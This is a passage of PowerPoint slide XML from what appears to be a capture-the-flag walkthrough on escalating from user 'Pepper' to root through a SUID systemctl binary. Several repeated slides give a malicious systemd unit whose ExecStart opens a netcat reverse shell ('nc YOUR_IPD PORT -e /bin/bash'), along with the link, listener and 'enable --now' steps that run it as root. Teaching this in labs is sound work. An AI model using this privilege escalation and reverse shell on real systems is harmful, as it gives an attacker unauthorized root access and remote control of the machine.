              <a:t>ExecStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –c “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> YOUR_IPD PORT -e /bin/bash”</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[Install]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WantedBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user.target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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Either write the file and send it using webserver + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or use Echo commands to build the file line-by-line in a reverse shell.</a:t>
            </a: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569623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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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Pepper -&gt; root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Looking at the SUID binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on GTFO bins:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/systemctl/#suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Summary:</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We need to create a service as Pepper that is malicious (reverse shell). Link it, and then enable it. </a:t>
            </a:r>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Google “How to make a service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>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[Unit]</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Description=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ownage</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[Service]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExecStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –c “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> YOUR_IPD PORT -e /bin/bash”</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[Install]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WantedBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user.target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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Either write the file and send it using webserver + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or use Echo commands to build the file line-by-line in a reverse shell.</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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> link /home/pepper/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own.service</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[Start your listener]</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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> enable –-now /home/pepper/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own.service</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[If you have trouble and need to try again]</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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> restart /home/pepper/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own.service</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734165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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pepper -&gt; root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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Looking at the SUID binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on GTFO bins:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/systemctl/#suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Summary:</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We need to create a service as Pepper that is malicious (reverse shell). Link it, and then enable it. </a:t>
            </a:r>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Google “How to make a service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>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[Unit]</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Description=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ownage</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[Service]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExecStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –c “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> YOUR_IPD PORT -e /bin/bash”</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[Install]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WantedBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user.target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="635508" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Either write the file and send it using webserver + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or use Echo commands to build the file line-by-line in a reverse shell.</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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> link /home/pepper/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own.service</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[Start your listener]</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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> enable –-now /home/pepper/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own.service</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[If you have trouble and need to try again]</a:t>
            </a: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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> restart /home/pepper/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own.service</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.shellhacks.com/systemd-service-file-example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>more info.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
